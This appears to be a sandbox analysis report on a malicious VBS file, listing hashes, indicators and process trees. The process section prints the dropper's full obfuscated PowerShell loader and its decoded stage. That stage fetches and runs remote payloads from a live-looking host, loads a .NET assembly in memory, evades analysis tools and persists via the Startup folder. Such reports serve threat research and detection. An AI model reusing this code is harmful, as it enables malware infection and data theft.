Analysis
-
max time kernel
93s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2024 11:44
Static task
static1
Behavioral task
behavioral1
Sample
Sign100000120001.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Sign100000120001.vbs
Resource
win10v2004-20241007-en
General
-
Target
Sign100000120001.vbs
-
Size
91KB
-
MD5
a7852939ea4eff9943163f2df44d425b
-
SHA1
500c33c8aea15e777dfe79d684e91d60e053eca2
-
SHA256
77b2713d68eaf0dd8c74bcaa12d8c15a3bcb26eb5784f28169b14351c0a2fc45
-
SHA512
6dac1d7dea7e5a6040df6e8d386e7ea1712060171a34200de9707447b5a79751f6ca8730e274d0db8c335d16c48b03b379088bd4f7ff3dcb3a7722b2d266e2bd
-
SSDEEP
1536:vBBBBBBBBB/Fzpy8G/nBBBBBBBBBBBBBBBBB:vBBBBBBBBBOBBBBBBBBBBBBBBBBB
Malware Config
Extracted
https://desckvbrat.com.br/Upcrypter/01/DLL01.txt
https://drive.google.com/uc?export=download&id=
https://desckvbrat.com.br/Upcrypter/01/DLL01.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 2332 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 652 powershell.exe 1064 powershell.exe 2332 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1064 powershell.exe 1064 powershell.exe 2332 powershell.exe 2332 powershell.exe 2332 powershell.exe 652 powershell.exe 652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 652 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1460 wrote to memory of 1064 1460 WScript.exe 83 PID 1460 wrote to memory of 1064 1460 WScript.exe 83 PID 1064 wrote to memory of 2332 1064 powershell.exe 85 PID 1064 wrote to memory of 2332 1064 powershell.exe 85 PID 2332 wrote to memory of 652 2332 powershell.exe 87 PID 2332 wrote to memory of 652 2332 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $blpvk = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE4ASg' + [char]66 + 'lAFQAdwAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAbQ' + [char]66 + 'zAEEAZw' + [char]66 + 'lAFIARA' + [char]66 + 'EACAARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHUAcA' + [char]66 + 'hAGQAYQ' + [char]66 + 'yAGkAYQAuAG8Acg' + [char]66 + 'nAC8AeA' + [char]66 + '4AHAALg' + [char]66 + '0AHgAdAAnACcAIAAoACAAXQ' + [char]66 + 'dAFsAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8AWwAgACwAIA' + [char]66 + 'sAGwAdQ' + [char]66 + 'uACQAIAAoAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JAC4AKQAgACcAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUAJwAgAD0AKwAgAE4ASg' + [char]66 + 'lAFQAdwAkADsAIAAnAE0AdA' + [char]66 + 'lAEcALgApACAAJwAnADEAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DAC4AMw' + [char]66 + '5AHIAYQ' + [char]66 + 'yAGIAaQ' + [char]66 + 'MAHMAcw' + [char]66 + 'hAGwAQwAnACcAIAAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcAJwAgAD0AKwAgAE4ASg' + [char]66 + 'lAFQAdwAkADsAIAAnAC4AKQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ACcAIAArACAAJwA6AF0Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAcA' + [char]66 + 'wAEEALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'OAEoAZQ' + [char]66 + 'UAHcAJAA7ACAAJwA7ACAAKQAgACkAJwAnAEEAJwAnACwAJwAnAJMhOgCTIScAJwAoAGUAYw' + [char]66 + 'hAGwAcA' + [char]66 + 'lAHIALg' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwAnACAAPQArACAATg' + [char]66 + 'KAGUAVA' + [char]66 + '3ACQAOwAgACcAOwApADgARg' + [char]66 + 'UAFUAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgACcAIAArACAAeA' + [char]66 + 'OAFYAWg' + [char]66 + 'lACQAIAArACAAJwAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAoACAAPQAgAEcAZQ' + [char]66 + 'hAHkAcgAkACAAOwAgACcAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAJwAgAD0AIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAnACAAIAA9ACAATg' + [char]66 + 'KAGUAVA' + [char]66 + '3ACQAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAeA' + [char]66 + 'OAFYAWg' + [char]66 + 'lACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'wAHkAWQ' + [char]66 + 'TAE4AJAA7ACAAKQAgAEUATQ' + [char]66 + 'LAGYAdQAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAAgAD0AIA' + [char]66 + 'wAHkAWQ' + [char]66 + 'TAE4AJAA7ACAAKQAgAFYAcA' + [char]66 + 'rAHUASgAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACAAKAAgAD0AIAAgAEUATQ' + [char]66 + 'LAGYAdQAkADsAIAA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAE4AbA' + [char]66 + 'yAGgAUAAkADsAIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACAAPQAgAE4AbA' + [char]66 + 'yAGgAUAAkADsAIAApACcAdA' + [char]66 + '4AHQALgAyADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + '4AE4AVg' + [char]66 + 'aAGUAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAAnADgARg' + [char]66 + 'UAFUAJwAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAA7AHkATQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'CACAAPQAgAGMAZQ' + [char]66 + 'tAFIAYwAkACAAOw' + [char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAAgAD0AIA' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOwAgACkAIA' + [char]66 + 'oAG0AeQ' + [char]66 + 'uAGoAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAoACAAPQAgAGgAbQ' + [char]66 + '5AG4AagAkADsAfQA7AHoAZA' + [char]66 + 'mAHkARgAkACAAbg' + [char]66 + 'yAHUAdA' + [char]66 + 'lAHIAOwApACkAZQ' + [char]66 + 'zAGEAYg' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwAkACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAHQAZQ' + [char]66 + 'HAC4AOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAA7AHsAeQ' + [char]66 + 'NAGUAcw' + [char]66 + 'hAEIAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGMAbg' + [char]66 + '1AEYAOw' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOw' + [char]66 + '9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 + 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAIA' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'RAEYAdg' + [char]66 + '6AFQAJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAAWA' + [char]66 + 'HAEMAQw' + [char]66 + 'KACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAA9ACAAWA' + [char]66 + 'HAEMAQw' + [char]66 + 'KADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'RAEYAdg' + [char]66 + '6AFQAJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAAsAHcAeg' + [char]66 + '0AHQAdwAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'wAHMAeg' + [char]66 + 'xAHYAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AcA' + [char]66 + 'zAHoAcQ' + [char]66 + '2ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAcA' + [char]66 + 'zAHoAcQ' + [char]66 + '2ACQAOw' + [char]66 + '9ADsAIAApACcAdwA1ADAAWgAxADgAdQ' + [char]66 + 'jADcAWg' + [char]66 + 'NAEsAOAA4AGcAZQ' + [char]66 + '0AGgAag' + [char]66 + 'uAEEAcA' + [char]66 + 'qADEATA' + [char]66 + 'CAC0ANA' + [char]66 + '5AEgAYQ' + [char]66 + 'hADEAJwAgACsAIA' + [char]66 + '3AHoAdA' + [char]66 + '0AHcAJAAoACAAPQAgAHcAeg' + [char]66 + '0AHQAdwAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJw' + [char]66 + 'WAEUAUw' + [char]66 + 'kAGoAdw' + [char]66 + 'VADkANQ' + [char]66 + 'SAC0AVw' + [char]66 + 'zAFkAdQ' + [char]66 + 'aAEwAaQ' + [char]66 + '3AHIAYgA1AFkATg' + [char]66 + 'RAC0ASA' + [char]66 + 'qAHIAYgAyAHAAMQAnACAAKwAgAHcAeg' + [char]66 + '0AHQAdwAkACgAIAA9ACAAdw' + [char]66 + '6AHQAdA' + [char]66 + '3ACQAewAgACkAIA' + [char]66 + 'RAGQAZQ' + [char]66 + 'jAFQAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAFEAZA' + [char]66 + 'lAGMAVAAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + '3AHoAdA' + [char]66 + '0AHcAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAewAgACkAIA' + [char]66 + 'DAGUATw' + [char]66 + 'JAGMAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'DAGUATw' + [char]66 + 'JAGMAJAAgADsA';$blpvk = $blpvk.replace('уЦϚ' , 'B') ;;$slvnr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $blpvk ) ); $slvnr = $slvnr[-1..-$slvnr.Length] -join '';$slvnr = $slvnr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs');powershell $slvnr2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$wttzw = 'https://drive.google.com/uc?export=download&id=';$TcedQ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $TcedQ ) {$wttzw = ($wttzw + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$wttzw = ($wttzw + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$vqzsp = (New-Object Net.WebClient);$vqzsp.Encoding = [System.Text.Encoding]::UTF8;$vqzsp.DownloadFile($wttzw, ($HzOMj + '\Upwin.msu') );$TzvFQ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs' -Destination ( $TzvFQ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$Stringbase;Function BaseMy{;$Fyfdz = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $Fyfdz;};$jnymh = ('https://desckvbrat.com.br/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$cRmec = $webClient.DownloadString( $jnymh ) ;$Stringbase = $cRmec; $cRmec = BaseMy;$cRmec | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$eZVNx = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$ufKME = ( Get-Content -Path $JukpV ) ;$NSYyp = $PhrlN.DownloadString( $ufKME ) ;$NSYyp | Out-File -FilePath $eZVNx -force ;$wTeJN = '$sNwoM = ''C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs'' ; $ryaeG = (Get-Content -Path ' + $eZVNx + ' -Encoding UTF8);' ;$wTeJN += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$wTeJN += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$wTeJN += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$wTeJN += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.pxx/gro.airadapu//:sptth'' , $sNwoM , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$wTeJN | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
